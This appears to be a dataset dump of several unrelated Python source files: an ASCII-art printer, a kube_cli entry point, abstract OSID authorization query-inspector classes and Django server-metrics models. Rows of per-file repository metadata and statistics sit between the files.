# Each row of the picture is stored once and printed in order.
_HOUSE_ROWS = (
    " /\\ ",
    " / \\ ",
    " +----+ ",
    " | .-.| ",
    " | | || ",
    " +-+-++ ",
)
for _row in _HOUSE_ROWS:
    print(_row)
| 23.875
| 76
| 0.47644
| 19
| 191
| 4.789474
| 0.631579
| 0.549451
| 0.659341
| 0.659341
| 0.32967
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.246073
| 191
| 8
| 77
| 23.875
| 0.631944
| 0.387435
| 0
| 0.333333
| 0
| 0
| 0.465517
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
afa9dcd7ca1c1814e058b20507c147a9a837c231
| 43
|
py
|
Python
|
kube_cli/__main__.py
|
strayge/kube-cli
|
afdb842694a87da1b9c66cf6b3911445a1271127
|
[
"MIT"
] | 1
|
2020-07-31T21:27:48.000Z
|
2020-07-31T21:27:48.000Z
|
kube_cli/__main__.py
|
strayge/kube-cli
|
afdb842694a87da1b9c66cf6b3911445a1271127
|
[
"MIT"
] | 2
|
2020-03-13T13:56:22.000Z
|
2020-03-30T08:58:59.000Z
|
kube_cli/__main__.py
|
strayge/kube-cli
|
afdb842694a87da1b9c66cf6b3911445a1271127
|
[
"MIT"
] | 1
|
2020-03-27T20:00:01.000Z
|
2020-03-27T20:00:01.000Z
|
"""Package entry point: ``python -m kube_cli`` executes this module."""
import kube_cli.main

if __name__ == "__main__":
    # Guard the call so importing this module (e.g. by tooling or
    # multiprocessing spawn) does not run the CLI as a side effect.
    # When executed via ``python -m kube_cli``, __name__ is "__main__",
    # so the entry-point behavior is unchanged.
    kube_cli.main.main()
| 10.75
| 20
| 0.790698
| 8
| 43
| 4
| 0.5
| 0.4375
| 0.6875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.093023
| 43
| 3
| 21
| 14.333333
| 0.820513
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 1
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
afb65c8013e2bfe82b0bd368028d3a2967679a94
| 20,768
|
py
|
Python
|
dlkit/abstract_osid/authorization/query_inspectors.py
|
UOC/dlkit
|
a9d265db67e81b9e0f405457464e762e2c03f769
|
[
"MIT"
] | 2
|
2018-02-23T12:16:11.000Z
|
2020-10-08T17:54:24.000Z
|
dlkit/abstract_osid/authorization/query_inspectors.py
|
UOC/dlkit
|
a9d265db67e81b9e0f405457464e762e2c03f769
|
[
"MIT"
] | 87
|
2017-04-21T18:57:15.000Z
|
2021-12-13T19:43:57.000Z
|
dlkit/abstract_osid/authorization/query_inspectors.py
|
UOC/dlkit
|
a9d265db67e81b9e0f405457464e762e2c03f769
|
[
"MIT"
] | 1
|
2018-03-01T16:44:25.000Z
|
2018-03-01T16:44:25.000Z
|
"""Implementations of authorization abstract base class query_inspectors."""
# pylint: disable=invalid-name
# Method names comply with OSID specification.
# pylint: disable=no-init
# Abstract classes do not define __init__.
# pylint: disable=too-few-public-methods
# Some interfaces are specified as 'markers' and include no methods.
# pylint: disable=too-many-public-methods
# Number of methods are defined in specification
# pylint: disable=too-many-ancestors
# Inheritance defined in specification
# pylint: disable=too-many-arguments
# Argument signature defined in specification.
# pylint: disable=duplicate-code
# All apparent duplicates have been inspected. They aren't.
import abc
class AuthorizationQueryInspector(metaclass=abc.ABCMeta):
    """The query inspector for examining authorization queries."""

    # Fix: ``__metaclass__ = abc.ABCMeta`` is Python 2 syntax and is
    # silently ignored by Python 3, so the @abc.abstractmethod markers
    # were not enforced.  Declaring the metaclass in the class header
    # restores abstractness (instantiation of this class now raises
    # TypeError, as intended for an abstract interface).

    @abc.abstractmethod
    def get_explicit_authorizations_terms(self):
        """Gets the explicit authorization query terms.

        :return: the query terms
        :rtype: ``osid.search.terms.BooleanTerm``

        *compliance: mandatory -- This method must be implemented.*

        """
        return  # osid.search.terms.BooleanTerm

    explicit_authorizations_terms = property(fget=get_explicit_authorizations_terms)

    @abc.abstractmethod
    def get_related_authorization_id_terms(self):
        """Gets the related authorization ``Id`` query terms.

        :return: the query terms
        :rtype: ``osid.search.terms.IdTerm``

        *compliance: mandatory -- This method must be implemented.*

        """
        return  # osid.search.terms.IdTerm

    related_authorization_id_terms = property(fget=get_related_authorization_id_terms)

    @abc.abstractmethod
    def get_related_authorization_terms(self):
        """Gets the related authorization query terms.

        :return: the query terms
        :rtype: ``osid.authorization.AuthorizationQueryInspector``

        *compliance: mandatory -- This method must be implemented.*

        """
        return  # osid.authorization.AuthorizationQueryInspector

    related_authorization_terms = property(fget=get_related_authorization_terms)

    @abc.abstractmethod
    def get_resource_id_terms(self):
        """Gets the resource ``Id`` query terms.

        :return: the query terms
        :rtype: ``osid.search.terms.IdTerm``

        *compliance: mandatory -- This method must be implemented.*

        """
        return  # osid.search.terms.IdTerm

    resource_id_terms = property(fget=get_resource_id_terms)

    @abc.abstractmethod
    def get_resource_terms(self):
        """Gets the resource query terms.

        :return: the query terms
        :rtype: ``osid.resource.ResourceQueryInspector``

        *compliance: mandatory -- This method must be implemented.*

        """
        return  # osid.resource.ResourceQueryInspector

    resource_terms = property(fget=get_resource_terms)

    @abc.abstractmethod
    def get_trust_id_terms(self):
        """Gets the trust ``Id`` query terms.

        :return: the query terms
        :rtype: ``osid.search.terms.IdTerm``

        *compliance: mandatory -- This method must be implemented.*

        """
        return  # osid.search.terms.IdTerm

    trust_id_terms = property(fget=get_trust_id_terms)

    @abc.abstractmethod
    def get_agent_id_terms(self):
        """Gets the agent ``Id`` query terms.

        :return: the query terms
        :rtype: ``osid.search.terms.IdTerm``

        *compliance: mandatory -- This method must be implemented.*

        """
        return  # osid.search.terms.IdTerm

    agent_id_terms = property(fget=get_agent_id_terms)

    @abc.abstractmethod
    def get_agent_terms(self):
        """Gets the agent query terms.

        :return: the query terms
        :rtype: ``osid.authentication.AgentQueryInspector``

        *compliance: mandatory -- This method must be implemented.*

        """
        return  # osid.authentication.AgentQueryInspector

    agent_terms = property(fget=get_agent_terms)

    @abc.abstractmethod
    def get_function_id_terms(self):
        """Gets the function ``Id`` query terms.

        :return: the query terms
        :rtype: ``osid.search.terms.IdTerm``

        *compliance: mandatory -- This method must be implemented.*

        """
        return  # osid.search.terms.IdTerm

    function_id_terms = property(fget=get_function_id_terms)

    @abc.abstractmethod
    def get_function_terms(self):
        """Gets the function query terms.

        :return: the query terms
        :rtype: ``osid.authorization.FunctionQueryInspector``

        *compliance: mandatory -- This method must be implemented.*

        """
        return  # osid.authorization.FunctionQueryInspector

    function_terms = property(fget=get_function_terms)

    @abc.abstractmethod
    def get_qualifier_id_terms(self):
        """Gets the qualifier ``Id`` query terms.

        :return: the query terms
        :rtype: ``osid.search.terms.IdTerm``

        *compliance: mandatory -- This method must be implemented.*

        """
        return  # osid.search.terms.IdTerm

    qualifier_id_terms = property(fget=get_qualifier_id_terms)

    @abc.abstractmethod
    def get_qualifier_terms(self):
        """Gets the qualifier query terms.

        :return: the query terms
        :rtype: ``osid.authorization.QualifierQueryInspector``

        *compliance: mandatory -- This method must be implemented.*

        """
        return  # osid.authorization.QualifierQueryInspector

    qualifier_terms = property(fget=get_qualifier_terms)

    @abc.abstractmethod
    def get_vault_id_terms(self):
        """Gets the vault ``Id`` query terms.

        :return: the query terms
        :rtype: ``osid.search.terms.IdTerm``

        *compliance: mandatory -- This method must be implemented.*

        """
        return  # osid.search.terms.IdTerm

    vault_id_terms = property(fget=get_vault_id_terms)

    @abc.abstractmethod
    def get_vault_terms(self):
        """Gets the vault query terms.

        :return: the query terms
        :rtype: ``osid.authorization.VaultQueryInspector``

        *compliance: mandatory -- This method must be implemented.*

        """
        return  # osid.authorization.VaultQueryInspector

    vault_terms = property(fget=get_vault_terms)

    @abc.abstractmethod
    def get_authorization_query_inspector_record(self, authorization_record_type):
        """Gets the authorization query inspector record corresponding to the given ``Authorization`` record ``Type``.

        :param authorization_record_type: an authorization record type
        :type authorization_record_type: ``osid.type.Type``
        :return: the authorization query inspector record
        :rtype: ``osid.authorization.records.AuthorizationQueryInspectorRecord``
        :raise: ``NullArgument`` -- ``authorization_record_type`` is ``null``
        :raise: ``OperationFailed`` -- unable to complete request
        :raise: ``Unsupported`` -- ``has_record_type(authorization_record_type)`` is ``false``

        *compliance: mandatory -- This method must be implemented.*

        """
        return  # osid.authorization.records.AuthorizationQueryInspectorRecord
class FunctionQueryInspector(metaclass=abc.ABCMeta):
    """This is the query inspector for examining function queries."""

    # Fix: ``__metaclass__ = abc.ABCMeta`` is Python 2 syntax and is
    # ignored by Python 3; declare the metaclass in the class header so
    # the abstract methods are actually enforced.

    @abc.abstractmethod
    def get_qualifier_hierarchy_id_terms(self):
        """Gets the qualifier hierarchy ``Id`` query terms.

        :return: the query terms
        :rtype: ``osid.search.terms.IdTerm``

        *compliance: mandatory -- This method must be implemented.*

        """
        return  # osid.search.terms.IdTerm

    qualifier_hierarchy_id_terms = property(fget=get_qualifier_hierarchy_id_terms)

    @abc.abstractmethod
    def get_qualifier_hierarchy_terms(self):
        """Gets the qualifier hierarchy query terms.

        :return: the query terms
        :rtype: ``osid.hierarchy.HierarchyQueryInspector``

        *compliance: mandatory -- This method must be implemented.*

        """
        return  # osid.hierarchy.HierarchyQueryInspector

    qualifier_hierarchy_terms = property(fget=get_qualifier_hierarchy_terms)

    @abc.abstractmethod
    def get_authorization_id_terms(self):
        """Gets the authorization ``Id`` query terms.

        :return: the query terms
        :rtype: ``osid.search.terms.IdTerm``

        *compliance: mandatory -- This method must be implemented.*

        """
        return  # osid.search.terms.IdTerm

    authorization_id_terms = property(fget=get_authorization_id_terms)

    @abc.abstractmethod
    def get_authorization_terms(self):
        """Gets the authorization query terms.

        :return: the query terms
        :rtype: ``osid.authorization.AuthorizationQueryInspector``

        *compliance: mandatory -- This method must be implemented.*

        """
        return  # osid.authorization.AuthorizationQueryInspector

    authorization_terms = property(fget=get_authorization_terms)

    @abc.abstractmethod
    def get_vault_id_terms(self):
        """Gets the vault ``Id`` query terms.

        :return: the query terms
        :rtype: ``osid.search.terms.IdTerm``

        *compliance: mandatory -- This method must be implemented.*

        """
        return  # osid.search.terms.IdTerm

    vault_id_terms = property(fget=get_vault_id_terms)

    @abc.abstractmethod
    def get_vault_terms(self):
        """Gets the vault query terms.

        :return: the query terms
        :rtype: ``osid.authorization.VaultQueryInspector``

        *compliance: mandatory -- This method must be implemented.*

        """
        return  # osid.authorization.VaultQueryInspector

    vault_terms = property(fget=get_vault_terms)

    @abc.abstractmethod
    def get_function_query_inspector_record(self, function_record_type):
        """Gets the function query inspector record corresponding to the given ``Function`` record ``Type``.

        :param function_record_type: a function record type
        :type function_record_type: ``osid.type.Type``
        :return: the function query inspector record
        :rtype: ``osid.authorization.records.FunctionQueryInspectorRecord``
        :raise: ``NullArgument`` -- ``function_record_type`` is ``null``
        :raise: ``OperationFailed`` -- unable to complete request
        :raise: ``Unsupported`` -- ``has_record_type(function_record_type)`` is ``false``

        *compliance: mandatory -- This method must be implemented.*

        """
        return  # osid.authorization.records.FunctionQueryInspectorRecord
class QualifierQueryInspector(metaclass=abc.ABCMeta):
    """This is the query inspector for examining qualifiers queries."""

    # Fix: ``__metaclass__ = abc.ABCMeta`` is Python 2 syntax and is
    # ignored by Python 3; declare the metaclass in the class header so
    # the abstract methods are actually enforced.

    @abc.abstractmethod
    def get_qualifier_hierarchy_id_terms(self):
        """Gets the qualifier hierarchy ``Id`` query terms.

        :return: the query terms
        :rtype: ``osid.search.terms.IdTerm``

        *compliance: mandatory -- This method must be implemented.*

        """
        return  # osid.search.terms.IdTerm

    qualifier_hierarchy_id_terms = property(fget=get_qualifier_hierarchy_id_terms)

    @abc.abstractmethod
    def get_qualifier_hierarchy_terms(self):
        """Gets the qualifier hierarchy query terms.

        :return: the query terms
        :rtype: ``osid.hierarchy.HierarchyQueryInspector``

        *compliance: mandatory -- This method must be implemented.*

        """
        return  # osid.hierarchy.HierarchyQueryInspector

    qualifier_hierarchy_terms = property(fget=get_qualifier_hierarchy_terms)

    @abc.abstractmethod
    def get_authorization_id_terms(self):
        """Gets the authorization ``Id`` query terms.

        :return: the query terms
        :rtype: ``osid.search.terms.IdTerm``

        *compliance: mandatory -- This method must be implemented.*

        """
        return  # osid.search.terms.IdTerm

    authorization_id_terms = property(fget=get_authorization_id_terms)

    @abc.abstractmethod
    def get_authorization_terms(self):
        """Gets the authorization query terms.

        :return: the query terms
        :rtype: ``osid.authorization.AuthorizationQueryInspector``

        *compliance: mandatory -- This method must be implemented.*

        """
        return  # osid.authorization.AuthorizationQueryInspector

    authorization_terms = property(fget=get_authorization_terms)

    @abc.abstractmethod
    def get_ancestor_qualifier_id_terms(self):
        """Gets the ancestor qualifier ``Id`` query terms.

        :return: the query terms
        :rtype: ``osid.search.terms.IdTerm``

        *compliance: mandatory -- This method must be implemented.*

        """
        return  # osid.search.terms.IdTerm

    ancestor_qualifier_id_terms = property(fget=get_ancestor_qualifier_id_terms)

    @abc.abstractmethod
    def get_ancestor_qualifier_terms(self):
        """Gets the ancestor qualifier query terms.

        :return: the query terms
        :rtype: ``osid.authorization.FunctionQueryInspector``

        *compliance: mandatory -- This method must be implemented.*

        """
        return  # osid.authorization.FunctionQueryInspector

    ancestor_qualifier_terms = property(fget=get_ancestor_qualifier_terms)

    @abc.abstractmethod
    def get_descendant_qualifier_id_terms(self):
        """Gets the descendant qualifier ``Id`` query terms.

        :return: the query terms
        :rtype: ``osid.search.terms.IdTerm``

        *compliance: mandatory -- This method must be implemented.*

        """
        return  # osid.search.terms.IdTerm

    descendant_qualifier_id_terms = property(fget=get_descendant_qualifier_id_terms)

    @abc.abstractmethod
    def get_descendant_qualifier_terms(self):
        """Gets the descendant qualifier query terms.

        :return: the query terms
        :rtype: ``osid.authorization.FunctionQueryInspector``

        *compliance: mandatory -- This method must be implemented.*

        """
        return  # osid.authorization.FunctionQueryInspector

    descendant_qualifier_terms = property(fget=get_descendant_qualifier_terms)

    @abc.abstractmethod
    def get_vault_id_terms(self):
        """Gets the vault ``Id`` query terms.

        :return: the query terms
        :rtype: ``osid.search.terms.IdTerm``

        *compliance: mandatory -- This method must be implemented.*

        """
        return  # osid.search.terms.IdTerm

    vault_id_terms = property(fget=get_vault_id_terms)

    @abc.abstractmethod
    def get_vault_terms(self):
        """Gets the vault query terms.

        :return: the query terms
        :rtype: ``osid.authorization.VaultQueryInspector``

        *compliance: mandatory -- This method must be implemented.*

        """
        return  # osid.authorization.VaultQueryInspector

    vault_terms = property(fget=get_vault_terms)

    @abc.abstractmethod
    def get_qualifier_query_inspector_record(self, qualifier_record_type):
        """Gets the qualifier query inspector record corresponding to the given ``Qualifier`` record ``Type``.

        :param qualifier_record_type: a qualifier query inspector record type
        :type qualifier_record_type: ``osid.type.Type``
        :return: the qualifier query inspector record
        :rtype: ``osid.authorization.records.QualifierQueryInspectorRecord``
        :raise: ``NullArgument`` -- ``qualifier_record_type`` is ``null``
        :raise: ``OperationFailed`` -- unable to complete request
        :raise: ``Unsupported`` -- ``has_record_type(qualifier_record_type)`` is ``false``

        *compliance: mandatory -- This method must be implemented.*

        """
        return  # osid.authorization.records.QualifierQueryInspectorRecord
class VaultQueryInspector:
    """This is the query inspector for examining vault queries."""

    # NOTE(review): ``__metaclass__`` is the Python 2 spelling; on Python 3
    # this attribute is inert and the @abc.abstractmethod markers are not
    # enforced -- confirm the supported interpreter version.
    __metaclass__ = abc.ABCMeta

    @abc.abstractmethod
    def get_function_id_terms(self):
        """Gets the function ``Id`` query terms.

        :return: the query terms
        :rtype: ``osid.search.terms.IdTerm``

        *compliance: mandatory -- This method must be implemented.*

        """
        return  # osid.search.terms.IdTerm

    function_id_terms = property(fget=get_function_id_terms)

    @abc.abstractmethod
    def get_function_terms(self):
        """Gets the function query terms.

        :return: the query terms
        :rtype: ``osid.authorization.FunctionQueryInspector``

        *compliance: mandatory -- This method must be implemented.*

        """
        return  # osid.authorization.FunctionQueryInspector

    function_terms = property(fget=get_function_terms)

    @abc.abstractmethod
    def get_qualifier_id_terms(self):
        """Gets the qualifier ``Id`` query terms.

        :return: the query terms
        :rtype: ``osid.search.terms.IdTerm``

        *compliance: mandatory -- This method must be implemented.*

        """
        return  # osid.search.terms.IdTerm

    qualifier_id_terms = property(fget=get_qualifier_id_terms)

    @abc.abstractmethod
    def get_qualifier_terms(self):
        """Gets the qualifier query terms.

        :return: the query terms
        :rtype: ``osid.authorization.QualifierQueryInspector``

        *compliance: mandatory -- This method must be implemented.*

        """
        return  # osid.authorization.QualifierQueryInspector

    qualifier_terms = property(fget=get_qualifier_terms)

    @abc.abstractmethod
    def get_authorization_id_terms(self):
        """Gets the authorization ``Id`` query terms.

        :return: the query terms
        :rtype: ``osid.search.terms.IdTerm``

        *compliance: mandatory -- This method must be implemented.*

        """
        return  # osid.search.terms.IdTerm

    authorization_id_terms = property(fget=get_authorization_id_terms)

    @abc.abstractmethod
    def get_authorization_terms(self):
        """Gets the authorization query terms.

        :return: the query terms
        :rtype: ``osid.authorization.AuthorizationQueryInspector``

        *compliance: mandatory -- This method must be implemented.*

        """
        return  # osid.authorization.AuthorizationQueryInspector

    authorization_terms = property(fget=get_authorization_terms)

    @abc.abstractmethod
    def get_ancestor_vault_id_terms(self):
        """Gets the ancestor vault ``Id`` query terms.

        :return: the query terms
        :rtype: ``osid.search.terms.IdTerm``

        *compliance: mandatory -- This method must be implemented.*

        """
        return  # osid.search.terms.IdTerm

    ancestor_vault_id_terms = property(fget=get_ancestor_vault_id_terms)

    @abc.abstractmethod
    def get_ancestor_vault_terms(self):
        """Gets the ancestor vault query terms.

        :return: the query terms
        :rtype: ``osid.authorization.VaultQueryInspector``

        *compliance: mandatory -- This method must be implemented.*

        """
        return  # osid.authorization.VaultQueryInspector

    ancestor_vault_terms = property(fget=get_ancestor_vault_terms)

    @abc.abstractmethod
    def get_descendant_vault_id_terms(self):
        """Gets the descendant vault ``Id`` query terms.

        :return: the query terms
        :rtype: ``osid.search.terms.IdTerm``

        *compliance: mandatory -- This method must be implemented.*

        """
        return  # osid.search.terms.IdTerm

    descendant_vault_id_terms = property(fget=get_descendant_vault_id_terms)

    @abc.abstractmethod
    def get_descendant_vault_terms(self):
        """Gets the descendant vault query terms.

        :return: the query terms
        :rtype: ``osid.authorization.VaultQueryInspector``

        *compliance: mandatory -- This method must be implemented.*

        """
        return  # osid.authorization.VaultQueryInspector

    descendant_vault_terms = property(fget=get_descendant_vault_terms)

    @abc.abstractmethod
    def get_vault_query_inspector_record(self, vault_record_type):
        """Gets the vault query inspector record corresponding to the given ``Vault`` record ``Type``.

        :param vault_record_type: a vault query inspector record type
        :type vault_record_type: ``osid.type.Type``
        :return: the vault query inspector record
        :rtype: ``osid.authorization.records.VaultQueryInspectorRecord``
        :raise: ``NullArgument`` -- ``vault_record_type`` is ``null``
        :raise: ``OperationFailed`` -- unable to complete request
        :raise: ``Unsupported`` -- ``has_record_type(vault_record_type)`` is ``false``

        *compliance: mandatory -- This method must be implemented.*

        """
        return  # osid.authorization.records.VaultQueryInspectorRecord
| 29.458156
| 118
| 0.675318
| 2,195
| 20,768
| 6.211845
| 0.059226
| 0.058673
| 0.06454
| 0.074221
| 0.87136
| 0.83359
| 0.777338
| 0.690942
| 0.679868
| 0.6707
| 0
| 0
| 0.228621
| 20,768
| 704
| 119
| 29.5
| 0.851124
| 0.562885
| 0
| 0.773481
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.243094
| false
| 0
| 0.005525
| 0
| 0.756906
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
a59714f6646d25287d9817f4d7b281e3012e6521
| 5,850
|
py
|
Python
|
metrics/models.py
|
BrianWaganerSTL/RocketDBaaS
|
d924589188411371842513060a5e08b1be3cdccf
|
[
"MIT"
] | 1
|
2018-11-04T09:36:35.000Z
|
2018-11-04T09:36:35.000Z
|
metrics/models.py
|
BrianWaganerSTL/RocketDBaaS_api
|
d924589188411371842513060a5e08b1be3cdccf
|
[
"MIT"
] | null | null | null |
metrics/models.py
|
BrianWaganerSTL/RocketDBaaS_api
|
d924589188411371842513060a5e08b1be3cdccf
|
[
"MIT"
] | null | null | null |
from django.db import models
from django.db.models import ForeignKey, DateTimeField, DecimalField, IntegerField, CharField, deletion
from djchoices import DjangoChoices, ChoiceItem
from rest_framework.compat import MinValueValidator
from dbaas.models import Server
# ====================================================================================
class Metrics_Cpu(models.Model):
    """Point-in-time CPU utilisation sample for a server.

    Each row stores the standard sar/top style percentage breakdown plus a
    collection error counter/message for the sampling run.
    """

    class Meta:
        db_table = 'metrics_cpu'

    server = ForeignKey(Server, on_delete=deletion.CASCADE, null=False)
    # Timestamp is supplied by the collector (no auto_now_add, unlike
    # Metrics_CpuLoad) -- presumably the sample time, not the insert time.
    created_dttm = DateTimeField(editable=False, null=False)
    # Percentages can legitimately reach 100.0; max_digits=4 with one decimal
    # place stores 0.0-100.0.  (The previous max_digits=3 capped storable
    # values at 99.9, so a fully idle or fully busy CPU could not be saved.)
    cpu_idle_pct = DecimalField(decimal_places=1, max_digits=4, null=False, default=0)
    cpu_user_pct = DecimalField(decimal_places=1, max_digits=4, null=False, default=0)
    cpu_system_pct = DecimalField(decimal_places=1, max_digits=4, null=False, default=0)
    cpu_iowait_pct = DecimalField(decimal_places=1, max_digits=4, null=False, default=0)
    cpu_irq_pct = DecimalField(decimal_places=1, max_digits=4, null=False, default=0)
    cpu_steal_pct = DecimalField(decimal_places=1, max_digits=4, null=False, default=0)
    cpu_guest_pct = DecimalField(decimal_places=1, max_digits=4, null=False, default=0)
    cpu_guest_nice_pct = DecimalField(decimal_places=1, max_digits=4, null=False, default=0)
    # Non-negative count of collection errors plus free-text detail.
    error_cnt = IntegerField(validators=[MinValueValidator(0)], null=False, default=0)
    error_msg = CharField(max_length=2000, null=False, default='')
class Metrics_MountPoint(models.Model):
    """Disk-usage sample for a single mount point on a server."""

    class Meta:
        db_table = 'metrics_mount_point'

    server = ForeignKey(Server, on_delete=deletion.CASCADE, null=False)
    # Timestamp supplied by the collector (no auto_now_add).
    created_dttm = DateTimeField(editable=False, null=False)
    mount_point = CharField(max_length=30, null=False, default='')
    # Sizes in GB; max_digits=5 with one decimal allows up to 9999.9 GB.
    allocated_gb = DecimalField(decimal_places=1, max_digits=5, null=False, default=0)
    used_gb = DecimalField(decimal_places=1, max_digits=5, null=False, default=0)
    # Usage can legitimately reach 100.0%; max_digits=4 stores 0.0-100.0.
    # (The previous max_digits=3 capped the storable value at 99.9, so a
    # completely full filesystem could not be recorded.)
    used_pct = DecimalField(decimal_places=1, max_digits=4, null=False, default=0)
    # Non-negative count of collection errors plus free-text detail.
    error_cnt = IntegerField(validators=[MinValueValidator(0)], null=False, default=0)
    error_msg = CharField(max_length=2000, null=False, default='')
class Metrics_CpuLoad(models.Model):
    """Load-average sample (1/5/15 minute) for a server."""

    class Meta:
        db_table = 'metrics_cpu_load'

    server = ForeignKey(Server, on_delete=deletion.CASCADE, null=False)
    # Stamped automatically at insert time, unlike Metrics_Cpu/_MountPoint.
    created_dttm = DateTimeField(editable=False, auto_now_add=True, null=False)
    # Non-negative load averages; max_digits=4 / decimal_places=2 allows
    # values up to 99.99.
    load_1min = DecimalField(validators=[MinValueValidator(0)], decimal_places=2, max_digits=4, null=False, default=0)
    load_5min = DecimalField(validators=[MinValueValidator(0)], decimal_places=2, max_digits=4, null=False, default=0)
    load_15min = DecimalField(validators=[MinValueValidator(0)], decimal_places=2, max_digits=4, null=False, default=0)
    # Non-negative count of collection errors plus free-text detail.
    error_cnt = IntegerField(validators=[MinValueValidator(0)], null=False, default=0)
    error_msg = CharField(max_length=2000, null=False, default='')
class Metrics_PingServer(models.Model):
    """Host-level ping result for a server."""

    class Meta:
        db_table = 'metrics_ping_server'

    class PingStatusChoices(DjangoChoices):
        # Declared states for ping_status (djchoices value, label, order).
        NORMAL = ChoiceItem("Normal", "Normal", 1)
        CRITICAL = ChoiceItem("Critical", "Critical", 2)
        BLACKOUT = ChoiceItem("Blackout", "Blackout", 3)

    server = ForeignKey(Server, on_delete=deletion.CASCADE, null=False)
    created_dttm = DateTimeField(editable=False, auto_now_add=True, null=False)
    # NOTE(review): default='' is not one of the declared choices -- confirm
    # whether an explicit initial status was intended.
    ping_status = CharField(max_length=30, null=False, choices=PingStatusChoices.choices, default='')
    ping_response_ms = IntegerField(null=False, default=0)
    # Non-negative count of collection errors plus free-text detail.
    error_cnt = IntegerField(validators=[MinValueValidator(0)], null=False, default=0)
    error_msg = CharField(max_length=2000, null=False, default='')
class Metrics_PingDb(models.Model):
    """Database-level ping result for a server (mirrors Metrics_PingServer)."""

    class Meta:
        db_table = 'metrics_ping_db'

    class PingStatusChoices(DjangoChoices):
        # Declared states for ping_db_status (djchoices value, label, order).
        NORMAL = ChoiceItem("Normal", "Normal", 1)
        CRITICAL = ChoiceItem("Critical", "Critical", 2)
        BLACKOUT = ChoiceItem("Blackout", "Blackout", 3)

    server = ForeignKey(Server, on_delete=deletion.CASCADE, null=False)
    created_dttm = DateTimeField(editable=False, auto_now_add=True, null=False)
    # NOTE(review): default='' is not one of the declared choices -- confirm
    # whether an explicit initial status was intended.
    ping_db_status = CharField(max_length=30, null=False, choices=PingStatusChoices.choices, default='')
    ping_db_response_ms = IntegerField(null=False, default=0)
    # Non-negative count of collection errors plus free-text detail.
    error_cnt = IntegerField(validators=[MinValueValidator(0)], null=False, default=0)
    error_msg = CharField(max_length=2000, null=False, default='')
class Metrics_HostDetail(models.Model):
    """Slow-changing host inventory facts (IP, reboot time, sizing, versions)."""

    class Meta:
        db_table = 'metrics_host_detail'

    server = ForeignKey(Server, on_delete=deletion.CASCADE, null=False)
    created_dttm = DateTimeField(editable=False, auto_now_add=True, null=False)
    # NOTE(review): max_length=20 is too short for a full IPv6 address
    # (up to 39/45 chars) -- confirm only IPv4 is expected, or consider
    # GenericIPAddressField.  Field name is camelCase unlike its siblings.
    ipAddress = CharField(max_length=20, null=True, blank=True)
    last_reboot = DateTimeField(null=True, blank=True)
    # Core count and RAM in GB.
    cpu = IntegerField(validators=[MinValueValidator(0)], null=True, blank=True)
    ram_gb = IntegerField(validators=[MinValueValidator(0)], null=True, blank=True)
    os_version = CharField(max_length=40, null=True, blank=True)
    db_version = CharField(max_length=30, null=True, blank=True)
    db_version_number = IntegerField(validators=[MinValueValidator(0)], null=True, blank=True)
    # Unlike the other metric models, error_cnt is nullable here.
    error_cnt = IntegerField(validators=[MinValueValidator(0)], null=True, blank=True)
    error_msg = CharField(max_length=2000, null=False, default='')
class Metrics_CollectionError(models.Model):
    """Error raised while collecting a named metric for a server."""

    class Meta:
        # NOTE(review): table name is pluralised ('collections') unlike the
        # singular class name -- confirm this matches the live schema.
        db_table = 'metrics_collections_error'

    server = ForeignKey(Server, on_delete=deletion.CASCADE, null=False)
    # Timestamp supplied by the collector (no auto_now_add).
    created_dttm = DateTimeField(editable=False, null=False)
    # Name of the metric whose collection failed (e.g. a model above).
    metric_name = CharField(max_length=40, null=False, blank=True)
    error_cnt = IntegerField(validators=[MinValueValidator(0)], null=False, default=0)
    error_msg = CharField(max_length=2000, null=False, default='')
# TODO: Metrics_DbTopSql
| 51.769912
| 119
| 0.737265
| 742
| 5,850
| 5.615903
| 0.142857
| 0.101512
| 0.115191
| 0.089753
| 0.862491
| 0.847132
| 0.827694
| 0.803216
| 0.739861
| 0.708423
| 0
| 0.022696
| 0.133846
| 5,850
| 112
| 120
| 52.232143
| 0.799684
| 0.018291
| 0
| 0.47191
| 0
| 0
| 0.03694
| 0.004356
| 0
| 0
| 0
| 0.008929
| 0
| 1
| 0
| false
| 0
| 0.05618
| 0
| 0.853933
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
3c4d648d94eed64b82fb50ea553c49ae51297f8a
| 21,159
|
py
|
Python
|
atom/nucleus/python/nucleus_api/api/application_api.py
|
sumit4-ttn/SDK
|
b3ae385e5415e47ac70abd0b3fdeeaeee9aa7cff
|
[
"Apache-2.0"
] | null | null | null |
atom/nucleus/python/nucleus_api/api/application_api.py
|
sumit4-ttn/SDK
|
b3ae385e5415e47ac70abd0b3fdeeaeee9aa7cff
|
[
"Apache-2.0"
] | null | null | null |
atom/nucleus/python/nucleus_api/api/application_api.py
|
sumit4-ttn/SDK
|
b3ae385e5415e47ac70abd0b3fdeeaeee9aa7cff
|
[
"Apache-2.0"
] | null | null | null |
